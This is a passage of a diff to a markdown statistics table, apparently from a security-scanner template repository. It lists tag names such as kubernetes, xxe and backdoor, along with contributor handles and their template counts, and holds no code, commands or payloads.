+| microsoft | 38 | dr_set | 7 | | | | | | | +| injection | 38 | randomstr1ng | 7 | | | | | | | +| jira | 37 | tarunkoyalwar | 7 | | | | | | | +| listing | 37 | harshbothra_ | 7 | | | | | | | +| kubernetes | 37 | gitlab red team | 6 | | | | | | | | ibm | 36 | evan rubinstein | 6 | | | | | | | -| osint-misc | 35 | justaacat | 6 | | | | | | | -| sap | 34 | ja1sh | 6 | | | | | | | -| ssl | 33 | megamansec | 6 | | | | | | | -| fuzz | 33 | imnightmaree | 6 | | | | | | | -| miscellaneous | 32 | byt3bl33d3r | 6 | | | | | | | -| osint-tech | 31 | pentest_swissky | 6 | | | | | | | -| ec2 | 30 | xelkomy | 6 | | | | | | | -| tls | 30 | praetorian-thendrickson | 6 | | | | | | | -| osint-coding | 30 | pathtaga | 6 | | | | | | | -| dlink | 29 | puzzlepeaches | 6 | | | | | | | -| wp-theme | 29 | hahwul | 6 | | | | | | | -| gitlab | 28 | devang-solanki | 6 | | | | | | | -| api | 28 | forgedhallpass | 6 | | | | | | | -| ssh | 28 | shine | 5 | | | | | | | -| k8s | 28 | ganofins | 5 | | | | | | | +| cti | 36 | __fazal | 6 | | | | | | | +| osint-misc | 35 | clem9669 | 6 | | | | | | | +| sap | 34 | pathtaga | 6 | | | | | | | +| ssl | 33 | forgedhallpass | 6 | | | | | | | +| fuzz | 33 | megamansec | 6 | | | | | | | +| miscellaneous | 32 | pentest_swissky | 6 | | | | | | | +| osint-tech | 31 | hahwul | 6 | | | | | | | +| osint-coding | 30 | byt3bl33d3r | 6 | | | | | | | +| tls | 30 | imnightmaree | 6 | | | | | | | +| ec2 | 30 | puzzlepeaches | 6 | | | | | | | +| wp-theme | 30 | ja1sh | 6 | | | | | | | +| dlink | 30 | xelkomy | 6 | | | | | | | +| k8s | 28 | praetorian-thendrickson | 6 | | | | | | | +| api | 28 | devang-solanki | 6 | | | | | | | +| gitlab | 28 | justaacat | 6 | | | | | | | +| fortinet | 28 | kh4sh3i | 5 | | | | | | | | bestwebsoft | 27 | andreluna | 5 | | | | | | | -| fortinet | 27 | defr0ggy | 5 | | | | | | | | citrix | 27 | your3cho | 5 | | | | | | | -| proxy | 26 | s0obi | 5 | | | | | | | -| cve2012 | 26 | panch0r3d | 5 | | | | | | | -| lfr | 25 | lucky0x0d | 5 | | | | | | | -| firewall | 25 | gtrrnr | 5 | | | | | | | -| manageengine | 25 | podalirius | 5 | | | | | | | -| weaver | 25 | r3naissance | 5 | | | | | | | -| zohocorp | 25 | vicrack | 5 | | | | | | | -| osint-images | 24 | prajiteshsingh | 5 | | | | | | | -| osint-business | 24 | robotshell | 5 | | | | | | | -| dns | 24 | powerexploit | 5 | | | | | | | -| admin | 24 | joanbono | 5 | | | | | | | -| osint-finance | 24 | yanyun | 5 | | | | | | | -| osint-shopping | 24 | mr-xn | 5 | | | | | | | -| zoho | 24 | kh4sh3i | 5 | | | | | | | -| yonyou | 23 | arm!tage | 5 | | | | | | | -| tomcat | 23 | r12w4n | 5 | | | | | | | -| xxe | 23 | 3th1c_yuk1 | 4 | | | | | | | -| audit | 23 | jpg0mez | 4 | | | | | | | -| stored-xss | 23 | h1ei1 | 4 | | | | | | | -| file-upload | 23 | pulsesecurity.co.nz | 4 | | | | | | | -| prestashop | 22 | wisnupramoedya | 4 | | | | | | | -| cicd | 22 | cookiehanhoan | 4 | | | | | | | -| s3 | 22 | shankar acharya | 4 | | | | | | | -| msf | 21 | heeress | 4 | | | | | | | -| github | 21 | nybble04 | 4 | | | | | | | -| printer | 21 | ggranjus | 4 | | | | | | | +| proxy | 27 | r3naissance | 5 | | | | | | | +| firewall | 26 | defr0ggy | 5 | | | | | | | +| cve2012 | 26 | s0obi | 5 | | | | | | | +| lfr | 26 | joanbono | 5 | | | | | | | +| ssh | 25 | vicrack | 5 | | | | | | | +| weaver | 25 | panch0r3d | 5 | | | | | | | +| manageengine | 25 | r12w4n | 5 | | | | | | | +| zohocorp | 25 | gtrrnr | 5 | | | | | | | +| zoho | 24 | powerexploit | 5 | | | | | | | +| osint-shopping | 24 | shine | 5 | | | | | | | +| osint-finance | 24 | ganofins | 5 | | | | | | | +| dns | 24 | prajiteshsingh | 5 | | | | | | | +| osint-business | 24 | lucky0x0d | 5 | | | | | | | +| osint-images | 24 | mr-xn | 5 | | | | | | | +| admin | 23 | podalirius | 5 | | | | | | | +| audit | 23 | yanyun | 5 | | | | | | | +| stored-xss | 23 | robotshell | 5 | | | | | | | +| xxe | 23 | arm!tage | 5 | | | | | | | +| yonyou | 23 | pulsesecurity.co.nz | 4 | | | | | | | +| file-upload | 23 | m4lwhere | 4 | | | | | | | +| tomcat | 23 | heeress | 4 | | | | | | | +| s3 | 22 | tanq16 | 4 | | | | | | | +| cicd | 22 | shankar acharya | 4 | | | | | | | +| github | 22 | scent2d | 4 | | | | | | | +| prestashop | 22 | xxcdd | 4 | | | | | | | +| weblogic | 21 | dadevel | 4 | | | | | | | +| printer | 21 | wisnupramoedya | 4 | | | | | | | | ecology | 21 | dolev farhi | 4 | | | | | | | -| weblogic | 21 | incogbyte | 4 | | | | | | | -| dast | 21 | dadevel | 4 | | | | | | | -| jenkins | 20 | k0pak4 | 4 | | | | | | | -| camera | 20 | e_schultze_ | 4 | | | | | | | -| hp | 19 | scent2d | 4 | | | | | | | -| grafana | 19 | 0xr2r | 4 | | | | | | | -| struts | 19 | xxcdd | 4 | | | | | | | -| wavlink | 19 | ice3man543 | 4 | | | | | | | -| rukovoditel | 19 | m4lwhere | 4 | | | | | | | -| ftp | 19 | lum8rjack | 4 | | | | | | | -| cve2011 | 18 | iamnooob | 4 | | | | | | | -| android | 18 | king-alexander | 4 | | | | | | | -| osint-music | 18 | tanq16 | 4 | | | | | | | -| ruijie | 18 | _generic_human_ | 3 | | | | | | | -| coldfusion | 18 | vsh00t | 3 | | | | | | | -| confluence | 17 | canberbamber | 3 | | | | | | | -| service | 17 | sushantkamble | 3 | | | | | | | -| mail | 17 | ambassify | 3 | | | | | | | -| nginx | 17 | skeltavik | 3 | | | | | | | -| azure | 17 | atomiczsec | 3 | | | | | | | -| node.js | 17 | c4sper0 | 3 | | | | | | | -| backup | 16 | splint3r7 | 3 | | | | | | | -| honeypot | 16 | me9187 | 3 | | | | | | | -| magento | 16 | yuzhe-zhang-0 | 3 | | | | | | | -| vpn | 16 | fxploit | 3 | | | | | | | -| status | 16 | thomas_from_offensity | 3 | | | | | | | -| osint-blog | 16 | binaryfigments | 3 | | | | | | | -| microweber | 16 | farish | 3 | | | | | | | -| alibaba | 16 | xianke | 3 | | | | | | | -| jarm | 16 | alifathi-h1 | 3 | | | | | | | -| cve2009 | 16 | fyoorer | 3 | | | | | | | -| rconfig | 16 | lark-lab | 3 | | | | | | | -| bypass | 15 | salts | 3 | | | | | | | -| zyxel | 15 | aringo | 3 | | | | | | | -| nodejs | 15 | 0w4ys | 3 | | | | | | | -| seeyon | 15 | davidmckennirey | 3 | | | | | | | -| cve2008 | 15 | andydoering | 3 | | | | | | | -| dashboard | 15 | flx | 3 | | | | | | | -| java | 15 | bernardofsr | 3 | | | | | | | -| cve2013 | 15 | badboycxcc | 3 | | | | | | | -| cnvd2021 | 15 | userdehghani | 3 | | | | | | | -| backdoor | 15 | impramodsargar | 3 | | | | | | | -| ruby | 15 | whoever | 3 | | | | | | | -| tongda | 15 | matt galligan | 3 | | | | | | | -| woocommerce | 15 | randomrobbie | 3 | | | | | | | -| setup | 14 | true13 | 3 | | | | | | | -| osint-art | 14 | isacaya | 3 | | | | | | | -| login-check | 14 | arcc | 3 | | | | | | | -| ssti | 14 | e1a | 3 | | | | | | | -| windows | 14 | ph33r | 3 | | | | | | | +| dast | 21 | lum8rjack | 4 | | | | | | | +| msf | 21 | king-alexander | 4 | | | | | | | +| jenkins | 20 | iamnooob | 4 | | | | | | | +| camera | 20 | nybble04 | 4 | | | | | | | +| rukovoditel | 19 | jpg0mez | 4 | | | | | | | +| ftp | 19 | 0xr2r | 4 | | | | | | | +| struts | 19 | ggranjus | 4 | | | | | | | +| wavlink | 19 | e_schultze_ | 4 | | | | | | | +| hp | 19 | ice3man543 | 4 | | | | | | | +| grafana | 19 | k0pak4 | 4 | | | | | | | +| android | 18 | 3th1c_yuk1 | 4 | | | | | | | +| cve2011 | 18 | incogbyte | 4 | | | | | | | +| osint-music | 18 | h1ei1 | 4 | | | | | | | +| ruijie | 18 | cookiehanhoan | 4 | | | | | | | +| coldfusion | 18 | unstabl3 | 3 | | | | | | | +| vpn | 17 | splint3r7 | 3 | | | | | | | +| confluence | 17 | swissky | 3 | | | | | | | +| azure | 17 | z3bd | 3 | | | | | | | +| honeypot | 17 | skeltavik | 3 | | | | | | | +| nginx | 17 | flx | 3 | | | | | | | +| node.js | 17 | binaryfigments | 3 | | | | | | | +| service | 17 | true13 | 3 | | | | | | | +| mail | 17 | evergreencartoons | 3 | | | | | | | +| microweber | 16 | randomrobbie | 3 | | | | | | | +| cve2009 | 16 | emenalf | 3 | | | | | | | +| jarm | 16 | e1a | 3 | | | | | | | +| status | 16 | j3ssie | 3 | | | | | | | +| alibaba | 16 | jarijaas | 3 | | | | | | | +| backup | 16 | whoever | 3 | | | | | | | +| rconfig | 16 | sushantkamble | 3 | | | | | | | +| magento | 16 | cheesymoon | 3 | | | | | | | +| osint-blog | 16 | matt galligan | 3 | | | | | | | +| woocommerce | 15 | me9187 | 3 | | | | | | | +| cve2013 | 15 | _generic_human_ | 3 | | | | | | | +| ssti | 15 | johnjhacking | 3 | | | | | | | +| setup | 15 | salts | 3 | | | | | | | +| nodejs | 15 | badboycxcc | 3 | | | | | | | +| tongda | 15 | aringo | 3 | | | | | | | +| cnvd2021 | 15 | dr0pd34d | 3 | | | | | | | +| seeyon | 15 | fyoorer | 3 | | | | | | | +| bypass | 15 | andydoering | 3 | | | | | | | +| installer | 15 | farish | 3 | | | | | | | +| backdoor | 15 | ph33r | 3 | | | | | | | +| cve2008 | 15 | taielab | 3 | | | | | | | +| ruby | 15 | dudez | 3 | | | | | | | +| zyxel | 15 | c4sper0 | 3 | | | | | | | +| dashboard | 15 | fxploit | 3 | | | | | | | +| java | 15 | alifathi-h1 | 3 | | | | | | | +| moosocial | 15 | 0w4ys | 3 | | | | | | | +| headless | 14 | isacaya | 3 | | | | | | | | creds-stuffing | 14 | imjust0 | 3 | | | | | | | -| auth | 14 | dr0pd34d | 3 | | | | | | | -| dell | 14 | f1tz | 3 | | | | | | | -| redhat | 14 | mavericknerd | 3 | | | | | | | -| osint-health | 14 | lucasljm2001 | 3 | | | | | | | -| git | 14 | taielab | 3 | | | | | | | -| icewarp | 14 | unstabl3 | 3 | | | | | | | -| nagios | 14 | dudez | 3 | | | | | | | -| domainmod | 14 | vagnerd | 3 | | | | | | | -| jboss | 14 | shifacyclewala | 3 | | | | | | | -| docker | 14 | jarijaas | 3 | | | | | | | -| redis | 14 | parth | 3 | | | | | | | -| headless | 14 | ekrause | 3 | | | | | | | -| node | 14 | j3ssie | 3 | | | | | | | -| npm | 14 | cheesymoon | 3 | | | | | | | -| smtp | 14 | emenalf | 3 | | | | | | | -| rds | 14 | huowuzhao | 3 | | | | | | | -| smb | 14 | z3bd | 3 | | | | | | | -| mysql | 13 | coldfish | 3 | | | | | | | -| cuppa | 13 | evergreencartoons | 3 | | | | | | | -| airflow | 13 | johnjhacking | 3 | | | | | | | -| postgresql | 13 | swissky | 3 | | | | | | | -| abstractapi | 13 | yash anand @yashanand155 | 3 | | | | | | | -| fortigate | 13 | k11h-de | 2 | | | | | | | -| laravel | 13 | thabisocn | 2 | | | | | | | -| graphql | 13 | sascha brendel | 2 | | | | | | | -| osint-dating | 13 | mrharshvardhan | 2 | | | | | | | -| rails | 13 | myztique | 2 | | | | | | | -| sonicwall | 13 | joshlarsen | 2 | | | | | | | -| moosocial | 13 | h0j3n | 2 | | | | | | | -| netgear | 13 | korteke | 2 | | | | | | | -| cuppacms | 13 | w4cky_ | 2 | | | | | | | -| hashicorp | 13 | raesene | 2 | | | | | | | -| osint-political | 13 | amsda | 2 | | | | | | | -| ivanti | 13 | parzival | 2 | | | | | | | -| drupal | 12 | thezakman | 2 | | | | | | | -| zimbra | 12 | joshua rogers | 2 | | | | | | | -| kafka | 12 | paperpen | 2 | | | | | | | -| netsweeper | 12 | cocxanh | 2 | | | | | | | -| webserver | 12 | bananabr | 2 | | | | | | | -| vbulletin | 12 | dahse89 | 2 | | | | | | | -| newrelic | 12 | michal mikolas (nanuqcz) | 2 | | | | | | | -| ofbiz | 12 | g4l1t0 | 2 | | | | | | | -| doppler | 12 | mzack9999 | 2 | | | | | | | -| cache | 11 | brucelsone | 2 | | | | | | | -| prometheus | 11 | ree4pwn | 2 | | | | | | | -| info-leak | 11 | udit_thakkur | 2 | | | | | | | -| jetbrains | 11 | 6mile | 2 | | | | | | | -| hikvision | 11 | christianpoeschl | 2 | | | | | | | -| django | 11 | paradessia | 2 | | | | | | | -| spring | 11 | danmcinerney | 2 | | | | | | | -| xstream | 11 | arliya | 2 | | | | | | | -| online-fire-reporting | 11 | geekby | 2 | | | | | | | -| iam | 11 | notnotnotveg | 2 | | | | | | | -| iis | 11 | shankaracharya | 2 | | | | | | | -| phpgurukul | 11 | thevillagehacker | 2 | | | | | | | -| jolokia | 11 | bing0o | 2 | | | | | | | -| fastjson | 11 | gal nagli | 2 | | | | | | | -| osint-video | 11 | thardt-praetorian | 2 | | | | | | | -| online_fire_reporting_system_project | 11 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| phpmyadmin | 11 | shelled | 2 | | | | | | | -| installer | 11 | sbani | 2 | | | | | | | -| dedecms | 10 | v0idc0de | 2 | | | | | | | -| samsung | 10 | herry | 2 | | | | | | | -| solr | 10 | github.com/its0x08 | 2 | | | | | | | -| db | 10 | wa1tf0rme | 2 | | | | | | | -| elasticsearch | 10 | bsysop | 2 | | | | | | | -| solarview | 10 | pxmme1337 | 2 | | | | | | | -| digitalocean | 10 | d4vy | 2 | | | | | | | -| sitecore | 10 | randomdhiraj | 2 | | | | | | | -| symfony | 10 | foulenzer | 2 | | | | | | | -| glpi | 10 | 666asd | 2 | | | | | | | -| thinkphp | 10 | joeldeleep | 2 | | | | | | | -| zabbix | 10 | lotusdll | 2 | | | | | | | -| xstream_project | 10 | zy9ard3 | 2 | | | | | | | -| dropbox | 10 | koti2 | 2 | | | | | | | -| firebase | 9 | dogancanbakir | 2 | | | | | | | -| opencats | 9 | 0xnirvana | 2 | | | | | | | -| elastic | 9 | 0xsapra | 2 | | | | | | | -| scada | 9 | 0xrudra | 2 | | | | | | | -| secret | 9 | kiblyn11 | 2 | | | | | | | -| exchange | 9 | usdag | 2 | | | | | | | -| sangfor | 9 | supr4s | 2 | | | | | | | -| artica | 9 | charles d. | 2 | | | | | | | -| lucee | 9 | c3l3si4n | 2 | | | | | | | -| python | 9 | bmcel | 2 | | | | | | | -| gitea | 9 | hetroublemakr | 2 | | | | | | | -| dahua | 9 | x1m_martijn | 2 | | | | | | | -| druid | 9 | brenocss | 2 | | | | | | | -| wso2 | 9 | martincodes-de | 2 | | | | | | | -| pfsense | 9 | danielmofer | 2 | | | | | | | -| vcenter | 9 | 0xsmiley | 2 | | | | | | | -| versa | 9 | sinkettu | 2 | | | | | | | -| sophos | 9 | zomsop82 | 2 | | | | | | | -| cloudtrail | 9 | streetofhackerr007 | 2 | | | | | | | -| progress | 9 | y4er | 2 | | | | | | | -| facebook | 9 | afaq | 2 | | | | | | | -| blind | 9 | florianmaak | 2 | | | | | | | -| cnvd2020 | 9 | sy3omda | 2 | | | | | | | -| moodle | 9 | kishore-hariram | 2 | | | | | | | -| crlf | 9 | bp0lr | 2 | | | | | | | -| kube | 9 | pbuff07 | 2 | | | | | | | -| bitbucket | 9 | lstatro | 2 | | | | | | | -| e-office | 8 | kre80r | 2 | | | | | | | -| ognl | 8 | redteambrasil | 2 | | | | | | | -| hms | 8 | ajaysenr | 2 | | | | | | | -| phpjabbers | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| spotweb | 8 | ricardo maia (brainfork) | 2 | | | | | | | -| phpinfo | 8 | vavkamil | 2 | | | | | | | -| gateway | 8 | 0xcrypto | 2 | | | | | | | -| discord | 8 | supras | 2 | | | | | | | -| recon | 8 | cckuakilong | 2 | | | | | | | -| odoo | 8 | t3l3machus | 2 | | | | | | | -| console | 8 | ehsahil | 2 | | | | | | | -| mlflow | 8 | nvn1729 | 2 | | | | | | | -| bucket | 8 | nkxxkn | 2 | | | | | | | -| cloud-enum | 8 | convisoappsec | 2 | | | | | | | -| config-audit | 8 | codexlynx | 2 | | | | | | | -| manager | 8 | mohammedsaneem | 2 | | | | | | | -| spotweb_project | 8 | dheerajmadhukar | 2 | | | | | | | -| atom | 8 | maximus decimus | 2 | | | | | | | -| symantec | 8 | n-thumann | 2 | | | | | | | -| cisco-switch | 8 | ayadim | 2 | | | | | | | -| emerge | 8 | israel comazzetto dos reis | 2 | | | | | | | -| oauth | 8 | manas_harsh | 2 | | | | | | | -| unauthenticated | 8 | gevakun | 2 | | | | | | | -| huawei | 8 | nuk3s3c | 2 | | | | | | | +| docker | 14 | bernardofsr | 3 | | | | | | | +| windows | 14 | shifacyclewala | 3 | | | | | | | +| smb | 14 | yash anand @yashanand155 | 3 | | | | | | | +| login-check | 14 | xianke | 3 | | | | | | | +| npm | 14 | arcc | 3 | | | | | | | +| rds | 14 | atomiczsec | 3 | | | | | | | +| nagios | 14 | yuzhe-zhang-0 | 3 | | | | | | | +| redis | 14 | impramodsargar | 3 | | | | | | | +| jboss | 14 | f1tz | 3 | | | | | | | +| icewarp | 14 | huowuzhao | 3 | | | | | | | +| git | 14 | vsh00t | 3 | | | | | | | +| domainmod | 14 | lucasljm2001 | 3 | | | | | | | +| osint-art | 14 | ambassify | 3 | | | | | | | +| node | 14 | coldfish | 3 | | | | | | | +| redhat | 14 | parth | 3 | | | | | | | +| auth | 14 | ekrause | 3 | | | | | | | +| smtp | 14 | lark-lab | 3 | | | | | | | +| osint-health | 14 | mavericknerd | 3 | | | | | | | +| dell | 14 | canberbamber | 3 | | | | | | | +| osint-political | 13 | davidmckennirey | 3 | | | | | | | +| cuppa | 13 | thomas_from_offensity | 3 | | | | | | | +| osint-dating | 13 | vagnerd | 3 | | | | | | | +| graphql | 13 | bmcel | 2 | | | | | | | +| airflow | 13 | 0xsmiley | 2 | | | | | | | +| hashicorp | 13 | moritz nentwig | 2 | | | | | | | +| laravel | 13 | mrharshvardhan | 2 | | | | | | | +| sonicwall | 13 | ree4pwn | 2 | | | | | | | +| cuppacms | 13 | bp0lr | 2 | | | | | | | +| netgear | 13 | cocxanh | 2 | | | | | | | +| ivanti | 13 | paradessia | 2 | | | | | | | +| abstractapi | 13 | bing0o | 2 | | | | | | | +| postgresql | 13 | supr4s | 2 | | | | | | | +| rails | 13 | 0xsapra | 2 | | | | | | | +| fortigate | 13 | afaq | 2 | | | | | | | +| mysql | 13 | herry | 2 | | | | | | | +| vbulletin | 12 | thevillagehacker | 2 | | | | | | | +| kafka | 12 | shankaracharya | 2 | | | | | | | +| webserver | 12 | z0ne | 2 | | | | | | | +| doppler | 12 | w4cky_ | 2 | | | | | | | +| netsweeper | 12 | maximus decimus | 2 | | | | | | | +| zimbra | 12 | sinkettu | 2 | | | | | | | +| ofbiz | 12 | danmcinerney | 2 | | | | | | | +| newrelic | 12 | nuk3s3c | 2 | | | | | | | +| drupal | 12 | ehsahil | 2 | | | | | | | +| info-leak | 12 | kiblyn11 | 2 | | | | | | | +| cache | 11 | cckuakilong | 2 | | | | | | | +| iam | 11 | supras | 2 | | | | | | | +| iis | 11 | wa1tf0rme | 2 | | | | | | | +| spring | 11 | msegoviag | 2 | | | | | | | +| xstream | 11 | github.com/its0x08 | 2 | | | | | | | +| prometheus | 11 | thezakman | 2 | | | | | | | +| django | 11 | randomdhiraj | 2 | | | | | | | +| online_fire_reporting_system_project | 11 | usdag | 2 | | | | | | | +| osint-video | 11 | streetofhackerr007 | 2 | | | | | | | +| fastjson | 11 | 0xnirvana | 2 | | | | | | | +| hikvision | 11 | michal mikolas (nanuqcz) | 2 | | | | | | | +| jolokia | 11 | martincodes-de | 2 | | | | | | | +| jetbrains | 11 | israel comazzetto dos reis | 2 | | | | | | | +| online-fire-reporting | 11 | christianpoeschl | 2 | | | | | | | +| phpmyadmin | 11 | redteambrasil | 2 | | | | | | | +| phpgurukul | 11 | mohammedsaneem | 2 | | | | | | | +| zabbix | 10 | amirhossein raeisi | 2 | | | | | | | +| elasticsearch | 10 | c3l3si4n | 2 | | | | | | | +| sitecore | 10 | ayadim | 2 | | | | | | | +| solr | 10 | socketz | 2 | | | | | | | +| dahua | 10 | bananabr | 2 | | | | | | | +| xstream_project | 10 | codexlynx | 2 | | | | | | | +| dropbox | 10 | charles d. | 2 | | | | | | | +| digitalocean | 10 | kishore-hariram | 2 | | | | | | | +| samsung | 10 | h0j3n | 2 | | | | | | | +| db | 10 | brucelsone | 2 | | | | | | | +| dedecms | 10 | ajaysenr | 2 | | | | | | | +| thinkphp | 10 | koti2 | 2 | | | | | | | +| solarview | 10 | korteke | 2 | | | | | | | +| symfony | 10 | gal nagli | 2 | | | | | | | +| glpi | 10 | davidegirardi | 2 | | | | | | | +| python | 9 | notnotnotveg | 2 | | | | | | | +| versa | 9 | x1m_martijn | 2 | | | | | | | +| firebase | 9 | pxmme1337 | 2 | | | | | | | +| crlf | 9 | paperpen | 2 | | | | | | | +| moodle | 9 | joshlarsen | 2 | | | | | | | +| exchange | 9 | nkxxkn | 2 | | | | | | | +| bitbucket | 9 | liwermor | 2 | | | | | | | +| cnvd2020 | 9 | t3l3machus | 2 | | | | | | | +| gitea | 9 | thardt-praetorian | 2 | | | | | | | +| sophos | 9 | lstatro | 2 | | | | | | | +| lucee | 9 | sbani | 2 | | | | | | | +| scada | 9 | hackerarpan | 2 | | | | | | | +| cloudtrail | 9 | gevakun | 2 | | | | | | | +| artica | 9 | florianmaak | 2 | | | | | | | +| secret | 9 | bsysop | 2 | | | | | | | +| kube | 9 | ep1csage | 2 | | | | | | | +| wso2 | 9 | parzival | 2 | | | | | | | +| facebook | 9 | lotusdll | 2 | | | | | | | +| elastic | 9 | clarkvoss | 2 | | | | | | | +| pfsense | 9 | d4vy | 2 | | | | | | | +| sangfor | 9 | v0idc0de | 2 | | | | | | | +| opencats | 9 | 0xelkomy | 2 | | | | | | | +| vcenter | 9 | egemenkochisarli | 2 | | | | | | | +| druid | 9 | 0xcrypto | 2 | | | | | | | +| blind | 9 | zomsop82 | 2 | | | | | | | +| progress | 9 | pbuff07 | 2 | | | | | | | +| config-audit | 8 | shelled | 2 | | | | | | | +| e-office | 8 | danielmofer | 2 | | | | | | | +| manager | 8 | 666asd | 2 | | | | | | | +| gateway | 8 | 8arthur | 2 | | | | | | | +| huawei | 8 | udit_thakkur | 2 | | | | | | | +| recon | 8 | convisoappsec | 2 | | | | | | | +| symantec | 8 | joeldeleep | 2 | | | | | | | +| microfocus | 8 | kre80r | 2 | | | | | | | +| phpjabbers | 8 | hetroublemakr | 2 | | | | | | | +| hms | 8 | sascha brendel | 2 | | | | | | | +| cloud-enum | 8 | 0xrudra | 2 | | | | | | | +| nexus | 8 | joshua rogers | 2 | | | | | | | +| ognl | 8 | amsda | 2 | | | | | | | +| wanhu | 8 | dheerajmadhukar | 2 | | | | | | | +| oauth | 8 | foulenzer | 2 | | | | | | | +| discord | 8 | dahse89 | 2 | | | | | | | +| mlflow | 8 | y4er | 2 | | | | | | | +| bucket | 8 | manas_harsh | 2 | | | | | | | +| metadata | 8 | brenocss | 2 | | | | | | | +| phpinfo | 8 | mzack9999 | 2 | | | | | | | | mirai | 8 | rafaelwdornelas | 2 | | | | | | | -| osint-news | 8 | liwermor | 2 | | | | | | | -| error | 8 | ep1csage | 2 | | | | | | | -| wanhu | 8 | z0ne | 2 | | | | | | | -| go | 8 | clarkvoss | 2 | | | | | | | -| metadata | 8 | luci | 2 | | | | | | | -| default-page | 8 | 0xelkomy | 2 | | | | | | | -| ruckus | 7 | davidegirardi | 2 | | | | | | | -| monstra | 7 | uomogrande | 2 | | | | | | | -| keking | 7 | msegoviag | 2 | | | | | | | -| openemr | 7 | 8arthur | 2 | | | | | | | -| teamcity | 7 | dbrwsky | 2 | | | | | | | -| vpc | 7 | hackerarpan | 2 | | | | | | | -| filemanager | 7 | socketz | 2 | | | | | | | -| avtech | 7 | moritz nentwig | 2 | | | | | | | -| fpd | 7 | alex | 1 | | | | | | | -| nortekcontrol | 7 | rotembar | 1 | | | | | | | -| nacos | 7 | ipanda | 1 | | | | | | | -| fortios | 7 | dale clarke | 1 | | | | | | | -| database | 7 | caon | 1 | | | | | | | -| joomla\! | 7 | remi gascou (podalirius) | 1 | | | | | | | -| instrusive | 7 | dabla | 1 | | | | | | | -| car_rental_management_system_project | 7 | thebinitghimire | 1 | | | | | | | -| gogs | 7 | akash.c | 1 | | | | | | | -| squirrelmail | 7 | dmartyn | 1 | | | | | | | -| opensis | 7 | zinminphy0 | 1 | | | | | | | -| rfi | 7 | udinchan | 1 | | | | | | | -| oos | 7 | shivampand3y | 1 | | | | | | | -| activemq | 7 | carson chan | 1 | | | | | | | -| f5 | 7 | yashanand155 | 1 | | | | | | | -| bloofox | 7 | kareemse1im | 1 | | | | | | | -| vms | 7 | aresx | 1 | | | | | | | -| nagiosxi | 7 | kchason | 1 | | | | | | | -| contec | 7 | whynotke | 1 | | | | | | | -| mongodb | 7 | tirtha | 1 | | | | | | | -| blockchain | 7 | watchtowr | 1 | | | | | | | -| shopify | 7 | ap3r | 1 | | | | | | | -| pmb | 7 | ptonewreckin | 1 | | | | | | | -| moodating | 7 | gboddin | 1 | | | | | | | -| bigip | 7 | mayankpandey01 | 1 | | | | | | | -| mobileiron | 7 | adilsoybali | 1 | | | | | | | -| landray | 7 | official_blackhat13 | 1 | | | | | | | -| nexus | 7 | j3ssie/geraldino2 | 1 | | | | | | | -| slack | 7 | zandros0 | 1 | | | | | | | -| twitter | 7 | shreyapohekar | 1 | | | | | | | -| exploitdb | 7 | petruknisme | 1 | | | | | | | -| solarwinds | 7 | luskabol | 1 | | | | | | | -| telesquare | 7 | h4kux | 1 | | | | | | | -| linkedin | 7 | galoget | 1 | | | | | | | -| maps | 7 | p-l- | 1 | | | | | | | -| cacti | 7 | yaser_s | 1 | | | | | | | -| websphere | 7 | adnanekhan | 1 | | | | | | | -| flutterwave | 6 | ahmed abou-ela | 1 | | | | | | | -| gcp | 6 | b4uh0lz | 1 | | | | | | | -| cobbler | 6 | ohlinge | 1 | | | | | | | -| webmin | 6 | freakyclown | 1 | | | | | | | -| servicenow | 6 | 0xkayala | 1 | | | | | | | -| ldap | 6 | team syslifters / christoph | 1 | | | | | | | -| | | mahrl | | | | | | | | -| paypal | 6 | rivalsec | 1 | | | | | | | -| asus | 6 | domenicoveneziano | 1 | | | | | | | -| zhiyuan | 6 | hlop | 1 | | | | | | | -| plesk | 6 | tea | 1 | | | | | | | -| geoserver | 6 | mr.bobo hp | 1 | | | | | | | -| doctor_appointment_system_project | 6 | smaranchand | 1 | | | | | | | -| microfocus | 6 | christbowel | 1 | | | | | | | -| elfinder | 6 | archer | 1 | | | | | | | -| 74cms | 6 | natto97 | 1 | | | | | | | -| couchdb | 6 | ling | 1 | | | | | | | -| chanjet | 6 | mchklt | 1 | | | | | | | -| magmi | 6 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| cockpit | 6 | s1r1u5_ | 1 | | | | | | | -| openvpn | 6 | noamrathaus | 1 | | | | | | | -| jetty | 6 | retr0 | 1 | | | | | | | -| advantech | 6 | tim_koopmans | 1 | | | | | | | -| asp | 6 | shifacyclewla | 1 | | | | | | | -| synacor | 6 | banana69 | 1 | | | | | | | -| express | 6 | philippdelteil | 1 | | | | | | | -| keycloak | 6 | soyelmago | 1 | | | | | | | -| leak | 6 | f1she3 | 1 | | | | | | | -| liferay | 6 | w8ay | 1 | | | | | | | -| minio | 6 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| rat | 6 | sttlr | 1 | | | | | | | -| jamf | 6 | ilovebinbash | 1 | | | | | | | -| kubelet | 6 | higor melgaço (eremit4) | 1 | | | | | | | -| lfprojects | 6 | booboohq | 1 | | | | | | | -| server | 6 | viondexd | 1 | | | | | | | -| sql | 6 | zhenwarx | 1 | | | | | | | -| bmc | 6 | regala_ | 1 | | | | | | | -| doctor-appointment-system | 6 | tehtbl | 1 | | | | | | | -| jeecg | 6 | lbb | 1 | | | | | | | -| log | 6 | youngpope | 1 | | | | | | | -| beyondtrust | 6 | 0ut0fb4nd | 1 | | | | | | | -| microstrategy | 6 | ratnadip gajbhiye | 1 | | | | | | | -| splunk | 6 | millermedia | 1 | | | | | | | -| vrealize | 6 | am0nt31r0 | 1 | | | | | | | -| tikiwiki | 6 | aravind | 1 | | | | | | | -| sonarqube | 6 | amirmsafari | 1 | | | | | | | -| typo3 | 6 | rinolock | 1 | | | | | | | -| nuuo | 5 | chesterblue | 1 | | | | | | | -| kkfileview | 5 | mlec | 1 | | | | | | | -| pyload | 5 | r3s ost | 1 | | | | | | | -| sentry | 5 | bughuntersurya | 1 | | | | | | | -| square | 5 | m0ck3d | 1 | | | | | | | -| carrental | 5 | aaronchen0 | 1 | | | | | | | -| genetechsolutions | 5 | dorkerdevil | 1 | | | | | | | -| goanywhere | 5 | furkansenan | 1 | | | | | | | -| redmine | 5 | wpsec | 1 | | | | | | | -| metinfo | 5 | unknown | 1 | | | | | | | -| chamilo | 5 | arall | 1 | | | | | | | -| react | 5 | xeldax | 1 | | | | | | | -| circarlife | 5 | knassar702 | 1 | | | | | | | -| percha | 5 | absshax | 1 | | | | | 